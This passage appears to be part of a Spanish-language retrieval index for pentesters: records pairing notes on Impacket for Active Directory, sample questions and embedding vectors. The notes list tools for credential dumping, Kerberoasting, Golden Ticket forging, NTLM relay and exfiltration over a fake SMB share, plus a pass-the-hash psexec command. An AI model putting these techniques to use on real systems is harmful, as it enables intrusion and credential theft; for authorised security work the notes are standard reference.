0.05994, -0.11765, 0.00964, 0.01784, -0.10208, 0.07343, -0.05338, 0.1245, 0.06044, 0.00626, 0.05635, 0.10906, -0.14755, -0.02961, 0.11985, -0.01624, -0.00264, 0.04775, 0.07201, 0.08163, -0.05552, -0.17546, 0.04337, -0.01395, -0.0207, -0.05679, -0.02328, 0.03064, -0.01625, 0.08713, 0.10622, -0.07761, 0.02442, 0.09836, 0.0685, 0.03441, -0.03145, -0.04849, -0.11642, 0.12051, -0.01009, 0.05224, 0.05331, -0.05588, -0.02153, -0.05481, 0.02224, 0.0074, -0.0159, -0.02623, -0.12105, 0.00693, -0.02162, -0.04834, -0.01277, 0.01814, -0.06425, 0.06543, -0.07035, -0.0181, 0.00966, -0.05314, 0.00565, 0.21072, -0.0857, -0.0054, 0.03586, -0.05772, -0.02086, 0.00426, -0.08396, 0.0128, -0.03548, -0.06129, 0.00465, -0.03755, 0.02165, 0.10057, -0.01164, 0.05922, 0.0629, -0.02473, 0.02928, -0.03356, -0.03463, -0.04684, 0.05828, 0.02441, -0.0439, 0.00191, -0.07504, -0.04311, 0.03464, 0.02956, -0.04535, -0.01965, -0.05441, -0.01321, 0.02321, 0.00323, 0.04044, 0.02127, -0.01828, 0.05275, 0.03664, 0.05545, 0.03131, 0.1123, -0.00014, -0.04701, 0.02273, -0.06765, 0.03425, -0.05898, -0.02811, -0.01178, -0.05224, 0.04771, 0.05135, -0.0092, 0.03669, 0.00553, -0.0142, 0.07188, -0.02134, -0.01593, -0.03085, 0.02346, 0.03162, -0.02831, -0.0446, 0.02751, -0.04556, 0.03645, -0.00188, 0.00189, -0.07751, 0.04706, -0.03009, -0.04842, 0.07472, 0.05862, -0.06003, -0.00204, 0.04609, 0.06654, 0.01812, -0.01032, 0.01946, -0.01533, -0.02856, -0.04486, -0.00138, 0.05882, 0.05807, -0.00375, 0.02081, 0.02973, 0.0379, 0.00794, -0.00835, -0.11118, -0.04717, -0.00421, 0.00363, -0.02647, 0.00988, 0.01509, 0.02103, 0.01878, -0.00673, 0.00503, -0.02697, -0.00674, -0.02038, -0.03881, -0.06663, 0.06718, -0.0118, -0.06485, -0.05677, -0.04102, -0.0646, -0.02009, -0.02534, -0.02134, -0.00716, -0.01405, 0.03982, -0.03113, -0.04158, 0.05691]} -{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Impacket\n\n> Suite **Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) sin ser Windows. Es como tener un \"Windows hablante\" en Kali.", "indexar": "Cuales son las herramientas de Python que me sirven para interactuar con sistemas Windows sin instalarlos?", "v": [0.0149, 0.04617, -0.13742, -0.22664, 0.03465, -0.21239, -0.12642, -0.08392, -0.06427, 0.00782, -0.05135, -0.01549, -0.05505, -0.0452, -0.01097, 0.00249, -0.05157, -0.16596, 0.03558, 0.00404, -0.05951, 0.02924, -0.14704, -0.07778, -0.02598, 0.14657, 0.02981, -0.09041, -0.12379, 0.05601, 0.03742, 0.05597, 0.09373, -0.0243, -0.18333, -0.11063, -0.07065, 0.14024, 0.04803, 0.03959, -0.04041, 0.03699, -0.01613, 0.13305, 0.00354, -0.02997, 0.00925, -0.07203, 0.02529, 0.04218, -0.10311, -0.07387, -0.06506, -0.03958, 0.06161, -0.19785, 0.14706, -0.039, 0.09108, 0.00549, -0.14134, 0.10215, -0.07505, 0.10684, 0.06683, 0.01028, -0.04469, -0.06455, -0.10603, 0.16032, -0.05523, 0.05206, 0.0239, -0.01339, 0.0696, 0.10488, -0.11651, 0.00468, 0.05091, 0.00689, -0.01665, -0.02425, -0.02703, 0.0033, 0.02107, -0.13869, -0.00541, -0.03793, 0.0213, -0.07697, 0.08487, 0.01851, -0.01959, 0.03793, 0.06292, -0.01159, 0.03489, -0.00799, -0.01687, 0.09229, -0.00023, -0.08074, -0.01021, 0.10567, -0.1248, -0.00555, 0.01307, -0.017, 0.00443, -0.05497, 0.05989, 0.05008, 0.02988, -0.02827, -0.04546, -0.0689, -0.01628, -0.06077, -0.05772, 0.03587, -0.03336, 0.04969, -0.077, 0.06731, -0.03817, -0.00681, -0.00185, 0.08929, -0.02092, 0.02799, 0.03004, -0.0625, -0.03403, 0.00187, -0.0451, 0.03553, 0.08031, -0.06397, -0.00599, -0.08293, 0.01383, 0.08252, 0.0217, -0.04297, 0.06449, 0.03145, 0.04621, 0.00556, -0.02116, -0.04907, 0.06853, 0.00708, -0.02784, 0.0429, -0.08564, -0.01815, 0.01021, 0.04405, 0.01425, -0.07662, 0.00507, -0.03168, 0.0187, -0.03975, -0.00184, -0.02508, -0.05821, 0.03161, 0.10082, 0.03524, 0.01194, 0.09008, 0.03046, -0.0269, -0.00149, -0.02112, 0.02938, -0.02696, 0.00693, -0.00902, -0.10094, 0.02109, 0.01772, -0.04886, -0.0049, -0.01013, -0.04227, -0.01504, -0.04454, 0.07975, -0.01102, 0.05323, -0.03989, -0.04855, 0.04931, 0.00996, -0.02421, 0.00199, 0.02687, 0.01088, -0.04835, 0.08616, -0.0594, -0.06869, 0.07119, 0.11714, -0.02787, 0.01047, 0.01368, -0.00369, 0.03725, 0.01072, 0.02822, -0.05447, 0.03767, -0.05519, 0.01092, 0.00653, 0.03972, 0.01988, -0.00831, 0.0046, 0.07872, -0.00057, -0.00075, -0.03828, 0.00483, -0.00697, 0.01511, -0.02949, -0.07179, -0.04641, -0.00211, -0.01359, 0.02718, -0.00973, 0.01026, -0.06003, -0.06116, -0.03618, -0.00833, 0.08996, 0.0014, -0.0883, -0.051, -0.0642, -0.0266, -0.01267, -0.03414, -0.06643, -0.02524, 0.00089, 0.04607, -0.04347, -0.03378, 0.03144]} -{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Impacket\n\n> Suite **Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) sin ser Windows. Es como tener un \"Windows hablante\" en Kali.", "indexar": "Existe alguna suite que permita hablar con servicios como SMB o RPC ejecutando scripts en Kali?", "v": [0.02815, 0.06055, -0.14038, -0.0895, -0.03027, -0.35844, 0.00372, -0.07756, -0.01483, -0.04783, -0.12567, 0.00178, 0.12612, -0.15669, 0.04686, 0.11767, -0.10498, -0.00141, 0.04248, -0.00893, 0.08178, -0.02739, -0.03791, 0.02926, -0.02196, 0.05313, 0.08838, 0.07259, -0.10116, -0.02126, -0.0108, 0.06215, 0.01776, -0.19538, 0.02592, -0.03895, -0.00933, 0.05954, 0.0535, 0.10582, -0.01115, 0.0549, -0.04217, 0.00266, 0.07192, -0.0231, 0.05653, -0.0058, 0.05483, 0.04207, 0.00667, -0.05949, -0.2192, 0.01139, -0.04424, -0.00549, 0.03169, -0.10395, -0.04107, -0.01771, -0.0224, 0.03274, 0.07498, -0.07858, 0.13915, 0.00973, -0.00664, -0.00452, -0.0023, 0.03793, -0.06842, 0.05236, -0.00681, 0.04306, 0.02227, -0.08926, -0.12435, -0.07636, 0.03562, 0.0813, -0.00449, -0.09716, -0.04953, 0.04406, -0.04763, -0.05486, -0.08274, -0.13521, -0.00952, -0.01823, 0.09798, 0.01732, -0.01317, 0.10167, 0.05966, -0.0058, 0.08801, -0.00677, 0.07674, 0.07429, 0.10961, 0.08284, -0.08006, 0.04567, -0.02164, 0.06548, 0.11971, -0.04436, 0.06522, -0.02252, -0.04116, 0.05242, -0.01474, -0.05212, -0.05834, -0.10981, -0.03788, -0.11797, 0.04657, -0.08294, -0.05633, 0.01768, -0.05207, -0.01706, -0.07853, -0.03222, -0.04209, -0.03787, 0.00799, -0.02319, -0.04348, -0.0415, -0.03001, -0.0753, 0.00347, 0.09634, 0.11276, 0.03834, -0.00849, -0.08036, 0.0754, 0.04571, 0.06758, 0.0879, 0.02687, 0.01901, -0.05087, -0.07306, -0.04507, 0.01453, 0.11464, 0.04152, -0.03301, 0.06918, -0.00933, -0.07646, 0.00108, -0.033, -0.01049, 0.09964, -0.01126, 0.00508, -0.06767, 0.03344, 0.0345, -0.00543, -0.07684, 0.0262, 0.06037, 0.03062, -0.02667, 0.03253, 0.0936, -0.10088, 0.01167, -0.01759, -0.02207, -0.05036, 0.01117, -0.01939, -0.01414, -0.00059, -0.04941, 0.06132, -0.02915, -0.01754, -0.01887, -0.00718, -0.06338, -0.01292, -0.00805, 0.01124, -0.01542, -0.07375, -0.06041, -0.0699, -0.04969, -0.05953, -0.00815, -0.02605, -0.10523, 0.09138, -0.02155, -0.02729, -0.01627, 0.04307, 0.03245, 0.03983, -0.06365, 0.03952, 0.03434, 0.04152, 0.05612, -0.02173, -0.02859, -0.01219, 0.04366, 0.04615, 0.06994, 0.00878, -0.01877, -0.03015, 0.06878, -0.05711, 0.00474, 0.0159, 0.02092, -0.01931, 0.00921, 0.03252, -0.02243, 0.01202, 0.00284, -0.00019, 0.03143, 0.00865, 0.00206, -0.03709, -0.01286, -0.06704, 0.01093, -0.00651, -0.0441, -0.06427, 0.03014, -0.00319, -0.08172, -0.0207, 0.02231, -0.01491, 0.03946, 0.02882, -0.0293, -0.00615, -0.03466, -0.02202]} -{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Los mΓ‘s ΓΊtiles\n```\nimpacket-psexec β†’ shell en la vΓ­ctima si tienes creds (estilo PsExec)\nimpacket-wmiexec β†’ ejecutar comandos sin tocar disco\nimpacket-smbexec β†’ otra ejecuciΓ³n remota\nimpacket-secretsdump β†’ vuelca NTDS.dit y SAM de un DC en remoto β†’ secretsdump\nimpacket-GetUserSPNs β†’ Kerberoasting\nimpacket-GetNPUsers β†’ AS-REP Roasting\nimpacket-getTGT β†’ pide/forja un TGT con cred conocida\nimpacket-getST β†’ pide un service ticket\nimpacket-smbserver β†’ share SMB falso para exfiltrar a Kali (Transferencia de ficheros)\nimpacket-ntlmrelayx β†’ relay NTLM\nimpacket-ticketer β†’ forja tickets β†’ Golden Ticket\n```", "indexar": "ΒΏhay herramientas para robar contraseΓ±as o tickets remotos?", "v": [0.16484, -0.05327, -0.08373, -0.18893, -0.00014, -0.01211, 0.06877, 0.04163, 0.03013, 0.00395, -0.10359, -0.13399, 0.16316, 0.01211, 0.18854, 0.05167, -0.02485, 0.14055, 0.01633, 0.03078, -0.01634, -0.00929, -0.01618, 0.06064, 0.02207, -0.09876, 0.12967, 0.04193, -0.1703, 0.04275, 0.063, -0.05826, 0.0658, 0.00418, -0.07556, 0.04631, 0.04689, 0.1168, -0.01101, 0.02747, 0.13118, 0.00634, -0.1506, 0.01039, 0.06898, -0.08809, -0.05672, 0.02269, 0.10151, 0.01818, -0.04855, -0.13656, -0.06059, -0.07336, -0.02147, -0.12571, 0.19286, 0.01395, 0.03064, -0.03935, -0.12033, -0.02331, -0.03325, 0.07021, -0.0517, -0.09587, 0.015, -0.06127, -0.10702, 0.07122, -0.13301, -0.00069, -0.00319, 0.14283, 0.02929, 0.01678, 0.01223, -0.01416, 0.03511, 0.03266, -0.10267, 0.00483, -0.02456, -0.02287, -0.09788, -0.04641, 0.1482, 0.02515, 0.01904, -0.04868, 0.08609, 0.04251, 0.00322, -0.01729, -0.01069, -0.0562, 0.01126, -0.0209, -0.10888, -0.01506, -0.07529, -0.00807, 0.01153, 0.1016, -0.13694, 0.03344, 0.01661, 0.00475, 0.01015, -0.048, -0.02539, 0.03333, -0.01865, -0.01631, 0.01286, 0.00303, 0.00096, -0.03542, 0.03275, -0.02624, 0.00864, -0.03158, -0.01203, -0.05064, 0.07345, -0.00653, -0.00135, 0.10099, -0.01635, -0.09939, 0.02593, -0.02185, -0.03752, -0.01577, 0.00946, 0.03422, -0.01437, -0.18691, -0.06985, -0.06805, -0.02194, 0.03118, -0.01873, 0.01134, 0.10147, 0.05387, 0.02416, 0.00739, -0.02784, -0.00753, -0.03672, -0.02924, -0.01464, 0.07043, 0.00402, 0.06864, -0.06507, -0.14224, -0.14727, 0.07159, -0.02211, -0.02275, -0.01808, -0.04566, -0.06774, -0.07024, 0.0272, 0.03392, 0.05521, 0.0572, -0.00431, 0.07658, 0.06649, -0.03754, -0.03611, -0.04533, 0.04048, -0.04911, 0.003, -0.08102, -0.0435, 0.02669, 0.00083, -0.01959, 0.0584, 0.00896, 0.10345, -0.01246, 0.01283, 0.0073, 0.01574, -0.04561, -0.06861, 0.03027, -0.00553, -0.03389, -0.06616, 0.00192, -0.01692, 0.00335, -0.03318, -0.0023, 0.02008, -0.03939, 0.10941, -0.01403, -0.03953, -0.04696, -0.03006, 0.0312, 0.05973, -0.03153, 0.03565, -0.0768, -0.0559, -0.06796, -0.03097, 0.01067, -0.04059, -0.03518, 0.01647, 0.01883, 0.04699, 0.00345, 0.04147, 0.0379, -0.02094, 0.03057, 0.05779, -0.03756, 0.02165, 0.0356, -0.02524, -0.02522, 0.03766, -0.04186, -0.01693, -0.0739, 0.00524, 0.02146, -0.06205, 0.06433, 0.01324, -0.05703, -0.09145, 0.00748, -0.07323, 0.01279, -0.00393, 0.00236, -0.01198, 0.00685, 0.00866, 0.02513, -0.01412, -0.0742]} -{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Los mΓ‘s ΓΊtiles\n```\nimpacket-psexec β†’ shell en la vΓ­ctima si tienes creds (estilo PsExec)\nimpacket-wmiexec β†’ ejecutar comandos sin tocar disco\nimpacket-smbexec β†’ otra ejecuciΓ³n remota\nimpacket-secretsdump β†’ vuelca NTDS.dit y SAM de un DC en remoto β†’ secretsdump\nimpacket-GetUserSPNs β†’ Kerberoasting\nimpacket-GetNPUsers β†’ AS-REP Roasting\nimpacket-getTGT β†’ pide/forja un TGT con cred conocida\nimpacket-getST β†’ pide un service ticket\nimpacket-smbserver β†’ share SMB falso para exfiltrar a Kali (Transferencia de ficheros)\nimpacket-ntlmrelayx β†’ relay NTLM\nimpacket-ticketer β†’ forja tickets β†’ Golden Ticket\n```", "indexar": "con quΓ© puedo forjar un ticket de servicio sin permisos?", "v": [-0.0049, 0.07381, -0.14518, -0.06147, 0.06168, -0.05821, -0.03437, -0.03813, -0.00074, -0.06204, -0.04543, -0.00266, 0.10888, -0.00731, 0.06342, 0.00738, 0.11136, 0.03698, 0.15085, 0.06118, 0.0731, 0.01359, 0.0448, -0.0163, -0.05741, 0.05044, 0.14096, -0.05876, -0.20984, -0.04961, -0.03152, -0.0755, 0.07646, -0.08937, 0.09693, 0.04115, 0.07128, 0.23042, 0.00725, -0.13192, 0.01528, -0.01383, 1e-05, 0.09374, -0.07568, -0.10354, -0.03974, 0.02668, -0.05093, -0.13895, -0.02481, -0.1026, -0.1223, -0.02027, -0.00733, 0.02408, 0.07335, -0.08306, -0.02941, 0.03297, -0.05886, -0.08635, -0.0265, 0.04644, 0.01487, 0.02835, 0.09879, 0.03465, 0.05132, 0.00029, -0.14805, 0.02401, 0.06664, 0.05256, 0.02642, 0.0423, -0.10719, -0.07205, 0.06683, 0.05821, 0.10651, 0.09082, -0.09245, -0.04971, 0.04234, -0.03582, 0.00144, -0.0615, -0.00717, 0.0543, 0.07334, 0.15111, 0.04969, 0.01927, 0.01305, -0.10019, -0.00892, 0.02454, -0.09526, -0.02592, -0.00053, 0.0314, -0.06308, 0.11657, -0.06755, 0.0252, 0.10408, -0.04835, -0.03556, 0.05479, -0.00983, 0.0286, -0.07136, -0.01149, -0.04193, 0.00391, -0.01805, -0.05759, -0.01082, 0.03794, 0.00369, -0.0344, 0.1053, -0.06256, 0.07078, -0.00738, -0.06178, 0.16438, 0.07067, -0.05158, 0.01383, 0.07195, -0.05102, 0.00559, 0.01705, 0.00278, 0.00493, -0.02407, -0.02772, 0.08109, 0.06706, 0.01843, 0.05505, 0.04724, 0.052, 0.01015, -0.0511, -0.02733, -0.0955, -0.11659, 0.01761, 0.00204, 0.0153, 0.14547, 0.01716, 0.06894, 0.0033, -0.09682, -0.04732, 0.07235, 0.01943, 0.02927, -0.01575, 0.11838, 0.04345, 0.02171, -0.07489, -0.04836, 0.02923, 0.07001, -0.0869, -0.00046, 0.0448, -0.04589, 0.09414, -0.04383, -0.09322, -0.05889, 0.01643, -0.03035, -0.00842, -0.05509, -0.05417, -0.03844, -0.0222, 0.01219, -0.02764, -0.07215, 0.07977, 0.03419, -0.00337, 0.0596, 0.00305, 0.01645, -0.0213, -0.04728, -0.02249, -0.04038, -0.06357, -0.04175, -0.04384, 0.01526, -0.02281, -0.01882, 0.0542, -0.0567, 0.0049, 0.07052, 0.02581, 0.03004, 0.00152, -0.05224, 0.10171, -0.0605, -0.07661, 0.01016, 0.04248, -0.01883, 0.01443, 0.00245, 0.10855, 0.00284, 0.03666, 0.00763, 0.05403, -0.03268, 0.07095, 0.00444, 0.08418, 0.08323, 0.02307, 0.03648, -0.03301, -0.0024, 0.04072, -0.00395, 0.04211, -0.0446, -0.06635, 0.02517, 0.03875, 0.08603, -0.01209, -0.01537, -0.03219, -0.02706, -0.04288, -0.02825, 0.00349, -0.03201, 0.02131, 0.05991, 0.04198, -0.04095, 0.06979, -0.06713]} -{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Los mΓ‘s ΓΊtiles\n```\nimpacket-psexec β†’ shell en la vΓ­ctima si tienes creds (estilo PsExec)\nimpacket-wmiexec β†’ ejecutar comandos sin tocar disco\nimpacket-smbexec β†’ otra ejecuciΓ³n remota\nimpacket-secretsdump β†’ vuelca NTDS.dit y SAM de un DC en remoto β†’ secretsdump\nimpacket-GetUserSPNs β†’ Kerberoasting\nimpacket-GetNPUsers β†’ AS-REP Roasting\nimpacket-getTGT β†’ pide/forja un TGT con cred conocida\nimpacket-getST β†’ pide un service ticket\nimpacket-smbserver β†’ share SMB falso para exfiltrar a Kali (Transferencia de ficheros)\nimpacket-ntlmrelayx β†’ relay NTLM\nimpacket-ticketer β†’ forja tickets β†’ Golden Ticket\n```", "indexar": "que programa sirve para exfiltrar datos a travΓ©s de shares SMB falsos?", "v": [0.04853, -0.01419, -0.0473, -0.14003, 0.09566, -0.11417, -0.03965, -0.20243, -0.03502, 0.01353, -0.05314, 0.00911, 0.043, -0.17104, -0.02147, 0.02437, -0.05236, -0.21216, -0.02945, 0.02762, 0.0521, -0.01541, -0.0033, -0.21221, -0.07588, 0.04025, -0.03727, -0.01636, -0.09793, 0.00665, 0.13391, -0.05251, 0.02198, -0.06147, 0.0773, 0.01497, -0.02839, 0.01234, 0.02012, -0.01845, 0.16611, 0.01917, -0.05772, -0.02431, 0.03113, 0.01759, -0.12816, 0.04357, 0.02925, 0.03247, -0.03379, 0.02718, -0.08683, 0.09247, -0.1042, -0.14115, -0.01982, -0.14004, -0.02536, 0.04502, -0.04271, -0.00034, 0.08558, -0.01303, 0.04213, -0.07964, 0.10847, 0.05022, -0.09847, 0.01985, -0.02166, 0.12476, 0.05157, -0.08844, -0.05359, -0.0498, 0.03064, -0.0049, -0.032, -0.03868, -0.02986, -0.09005, 0.0612, 0.0713, -0.00293, 0.02481, 0.05904, -0.03035, -0.05346, -0.10055, -0.00586, 0.14765, 0.01733, 0.05724, 0.05483, 0.0293, 0.08047, -0.03736, -0.00599, 0.04934, 0.07561, -0.0102, -0.11182, 0.09553, -0.02871, 0.11611, 0.00978, 0.00077, -0.0742, 0.04783, -0.04614, 0.00762, -0.10522, -0.04637, 0.0387, -0.04244, 0.00435, -0.04363, 0.02959, 0.00539, -0.09324, -0.07116, 0.00648, -0.01779, -0.02567, -0.00219, -0.04096, 0.07114, 0.0302, 0.0733, -0.06289, 0.08326, -0.01337, -0.02014, -0.0087, -0.07496, -0.01646, -0.04564, -0.02342, -0.10674, 0.04296, 0.10831, -0.01433, 0.00766, -0.03072, -0.03621, -0.01124, -0.01613, -0.02387, -0.05374, 0.03197, 0.03492, 0.03473, 0.0972, -0.0727, 0.03782, 0.01963, -0.12213, -0.04982, 0.06838, -0.05148, 0.02742, -0.03785, 0.02507, 0.04082, -0.02709, 0.02473, -0.01721, 0.06368, 0.04881, -0.04718, 0.11119, 0.1071, -0.10612, 0.04854, 0.04906, -0.01629, -0.1038, 0.03868, -0.02061, -0.02316, -0.00386, 0.08909, 0.03539, -0.02477, -0.06935, -0.06793, -0.00756, 0.036, -0.04839, -0.0116, 0.0042, 0.02903, 0.03096, -0.00937, -0.01553, -0.0018, -0.02124, 0.13138, -0.02214, -0.06339, 0.08128, -0.07243, -0.04237, 0.02659, 0.11214, -0.01007, -0.05149, 0.03444, 0.03461, 0.03556, -0.05915, -0.00652, -0.03123, -0.03552, -0.061, 0.08339, 0.02395, 0.03959, 0.07275, -0.03128, 0.02221, 0.05673, 0.07, -0.09553, -0.04225, 0.02918, 0.01001, 0.04653, -0.00378, -0.01809, 0.01661, 0.00494, -0.0201, 0.06602, -0.00361, 0.00093, 0.01587, -0.00955, -0.095, -0.04557, 0.01253, -0.04372, -0.09555, 0.04896, 0.03085, -0.07997, 0.00402, 0.10367, -0.02307, -0.04234, -0.02907, 0.02105, -0.03115, 0.03338, -0.04758]} -{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Lateral con hash (sin reverse shell nueva)\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\nShell SYSTEM en otra mΓ‘quina, autenticado y limpio β†’ Pass-the-Hash, Movimiento lateral.\n\nRelacionado: Mimikatz Β· Active Directory Β· OSCP MOC", "indexar": "cual es una alternativa libre a impacket para realizar movimientos laterales con pass-the-hash?", "v": [0.08337, 0.01816, -0.1784, -0.0326, -0.13477, -0.03452, -0.02809, 0.04692, -0.13897, 0.01643, -0.07396, -0.0611, -0.01809, 0.09645, 0.1495, 0.05478, 0.04986, 0.02456, -0.0361, -0.01364, -0.11307, 0.02515, -0.11904, -0.03933, 0.03395, -0.00036, -0.02691, 0.10851, -0.23089, 0.00789, -0.05605, 0.00133, -0.00401, -0.01531, 0.03936, -0.00129, 0.0757, 0.09654, 0.1011, -0.03986, -0.03428, 0.03955, -0.16541, 0.09933, -0.09981, -0.11595, -0.08457, 0.08847, -0.01929, -0.09336, 0.09198, 0.0631, -0.13443, 0.01474, 0.04947, -0.09149, 0.14022, -0.03096, -0.12336, -0.05644, -0.02191, 0.13351, 0.0512, 0.0862, 0.08878, -0.05933, -0.00442, -0.06749, -0.09345, 0.06821, 0.08994, 0.0345, -0.00975, 0.0786, -0.13897, 0.12943, -0.04934, -0.04889, -0.01711, 0.14457, 0.05989, -0.0154, -0.00966, 0.02732, -0.07947, -0.08549, 0.01892, -0.0881, 0.09716, 0.10227, 0.06565, 0.03122, -0.00748, 0.08612, -0.0497, 0.00405, -0.06587, 0.04136, -0.08252, 0.01608, 0.04916, 0.0415, -0.14655, 0.02625, -0.00843, -0.07301, 0.02879, 0.0655, -0.0491, 0.0645, 0.08823, 0.01265, 0.04159, 0.00104, 0.02142, -0.02687, -0.10127, 0.02633, -0.0237, 0.01408, -0.01943, -0.00629, -0.0346, -0.12192, 0.04768, -0.00754, 0.05297, 0.04345, -0.07222, 0.04541, 0.07991, 0.0094, -0.07902, -0.05888, -0.08065, -0.03297, 0.10525, 0.01808, 0.05204, 0.01121, 0.0381, -0.00107, -0.01126, 0.04092, 0.07876, 0.02091, 0.04309, 0.02639, -0.02237, 0.019, -0.02917, 0.00434, 0.0045, 0.07486, -0.00362, 0.02689, -0.09512, -0.06366, -0.1167, 0.09427, 0.01314, 0.03447, -0.08633, -0.01365, -0.00721, -0.04433, -0.00073, -0.0016, -0.05365, -0.01054, -0.01921, -0.02666, 0.05899, -0.02422, 0.05373, -0.02307, -0.07535, -0.04624, 0.08902, -0.08419, 0.03574, 0.03803, -0.02734, -0.03115, 0.00145, -0.0962, 0.03796, 0.0229, 0.02782, 0.06373, -0.02028, 0.05284, -0.05986, -0.04611, -0.05724, 0.00336, -0.00733, -0.09415, 0.02961, 0.00317, -0.01227, 0.01841, -0.01758, -0.03786, -0.01158, 0.03594, -0.05943, 0.04509, 0.05248, 0.05352, 0.04116, -0.0146, 0.10316, 0.01107, -0.08547, 0.00342, -0.00434, 0.01461, -0.04662, -0.03166, 0.01922, 0.03577, 0.02803, 0.011, -0.01288, 0.03059, 0.04088, 0.07608, -0.01338, 0.04092, 0.03193, 0.03145, -0.00035, 0.04285, 0.01785, 0.04694, 0.0197, 0.01634, -0.03569, -0.03876, 0.02833, 0.04012, -0.02777, -0.01095, 0.01437, 0.01356, -0.11055, 0.03632, -0.02265, -0.0467, -0.01338, 0.04577, -0.00215, 0.00274, 0.03312, 0.00464]} -{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Lateral con hash (sin reverse shell nueva)\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\nShell SYSTEM en otra mΓ‘quina, autenticado y limpio β†’ Pass-the-Hash, Movimiento lateral.\n\nRelacionado: Mimikatz Β· Active Directory Β· OSCP MOC", "indexar": "que programa puedo usar para obtener un shell system autentico sin reverse shell?", "v": [0.08012, 0.02749, -0.18133, -0.03193, 0.07004, -0.03687, -0.10655, -0.1585, -0.07016, 0.06526, -0.15332, 0.00897, -0.03751, -0.04794, 0.06224, -0.01887, -0.07712, -0.11104, 0.01714, 0.05738, 0.02854, -0.07448, -0.07075, -0.1545, -0.04112, 0.12769, 0.02166, 0.06468, -0.00697, -0.06377, -0.01038, -0.05824, 0.13707, -0.13209, -0.02255, 0.01686, 0.02831, 0.01986, 0.04396, 0.08196, 0.08879, 0.00508, -0.0688, 0.13398, 0.11746, 0.01495, 0.09448, -0.03533, -0.05937, -0.04791, -0.06249, -0.07954, -0.24156, 0.04617, 0.06761, -0.1007, 0.12102, -0.0654, 0.06177, -0.01435, -0.08963, 0.04332, 0.06043, 0.03135, 0.09566, 0.01117, 0.01958, -0.08075, -0.09192, -0.01611, -0.02878, 0.03617, 0.09408, 0.03303, -0.06849, 0.01829, 0.01768, -0.01853, 0.03527, -0.00886, -0.06446, -0.05172, 0.04933, 0.10369, -0.05338, -0.07114, 0.07191, -0.09611, 0.02089, -0.02192, -0.00979, 0.04046, 0.00793, 0.08461, 0.06144, -0.11215, -0.03832, 0.02663, -0.09299, 0.0573, 0.03573, -0.09716, -0.03341, 0.13671, -0.00145, 0.03318, -0.0011, -0.02708, 0.00539, 0.12847, -0.06461, -0.12014, -0.06044, 0.01629, -0.01476, 0.01936, -0.06177, -0.05469, 0.04415, -0.10088, -0.05387, -0.01067, -0.06389, -0.01788, 0.09973, 0.01868, -0.0308, 0.11242, -0.03361, 0.05799, 0.01762, -0.00571, -0.03852, 0.02345, -0.07485, -0.02925, 0.06201, 0.02058, 0.01519, -0.02582, 0.02133, 0.11308, -0.03073, -0.01476, 0.01321, -0.03691, -0.02131, -0.10664, -0.06089, -0.01648, 0.02528, 0.09181, -0.00108, 0.05417, -0.08736, -0.05752, 0.07551, -0.04514, -0.02831, -0.02067, -0.07311, -0.00937, -0.01889, 0.054, 0.02957, -0.06235, -0.03926, 0.02126, 0.0651, 0.07556, 0.015, 0.09658, 0.07455, -0.02439, 0.04865, 0.02405, -0.01419, -0.07606, 0.0513, -0.03881, -0.02804, 0.02923, 0.01312, -0.04237, -0.02747, 0.04488, -0.01883, 0.08753, -0.0226, 0.035, 0.07694, 0.04656, 0.04644, -0.00487, -0.00962, 0.06055, 0.04431, -0.0774, 0.08333, -0.0091, -0.07029, 0.09274, 0.05529, -0.08693, 0.06936, 0.08052, -0.05916, -0.00924, 0.02654, 0.06999, 0.01048, -0.01401, 0.04576, 0.05925, -0.00503, 0.00251, 0.00259, 0.02833, 0.01985, 0.03688, -0.00573, 0.01636, 0.03528, 0.11723, 0.00209, -0.09665, 0.02406, 0.02537, -0.01048, -0.02621, -0.04186, -0.02089, 0.00116, -0.02259, -0.00215, 0.00282, 0.02893, -0.01324, 0.0198, -0.06207, 0.01836, 0.12817, -0.00486, -0.07047, 0.00235, -0.00034, -0.05477, -0.00947, 0.02347, -0.02728, -0.0569, 0.05899, 0.03228, -0.07009, 0.02696, -0.00766]} -{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Lateral con hash (sin reverse shell nueva)\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\nShell SYSTEM en otra mΓ‘quina, autenticado y limpio β†’ Pass-the-Hash, Movimiento lateral.\n\nRelacionado: Mimikatz Β· Active Directory Β· OSCP MOC", "indexar": "con que herramienta puedo ejecutar psexec autenticado solo con el hash NTLM?", "v": [-0.03083, -0.06393, -0.14432, -0.01107, 0.10064, -0.05139, -0.12651, 0.05092, -0.08128, 0.12542, -0.09512, 0.0786, 0.01598, -0.02216, 0.03294, 0.10353, 0.00115, -0.10213, -0.00251, 0.03363, -0.0181, -0.08187, -0.20604, -0.07354, 0.02337, -0.06156, 0.01398, 0.11554, -0.2098, 0.00345, -0.1028, -0.01833, -0.04818, -0.0115, 0.05386, 0.00086, -0.02035, 0.04103, 0.0238, 0.19803, 0.06511, 0.18262, 